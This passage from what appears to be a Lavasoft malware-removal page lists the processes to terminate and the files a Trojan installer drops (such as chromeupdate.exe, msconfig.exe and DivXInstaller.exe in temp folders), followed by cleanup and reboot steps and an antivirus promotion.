  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    msconfig.exe:656
    %original file name%.exe:228
    irsetup.exe:188
    irsetup.exe:1668
    chromeupdate.exe:1820

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\left_image[1].png (2936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\accept[1].gif (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\main[1].css (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe:typelib (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\finish[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\cancel[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\next[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\amipb[1].js (29301 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\index[1].htm (8841 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\footer_img[1].png (937 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\cancel1[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\decline[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\skip[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Desktop\Continue installation .lnk (898 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1609 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1137 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\chromeupdate.exe (1351514 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\getthefile.txt (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (16 bytes)
    %Program Files%\Your Product\lua5.1.dll (2902 bytes)
    %Program Files%\Your Product\Uninstall\IRIMG1.JPG (2 bytes)
    %Program Files%\Your Product\Uninstall\IRIMG2.JPG (29 bytes)
    %Program Files%\Your Product\Uninstall\uni3.tmp (9317 bytes)
    %Program Files%\Your Product\Uninstall\uninstall.xml (3475 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe (11824 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
    %Program Files%\Your Product\uninstall.exe (9213 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\MediaPlayer__15159_il35679.enc (7496 bytes)
    %Program Files%\Your Product\Uninstall\uninstall.dat (2104 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\msconfig.exe (16 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now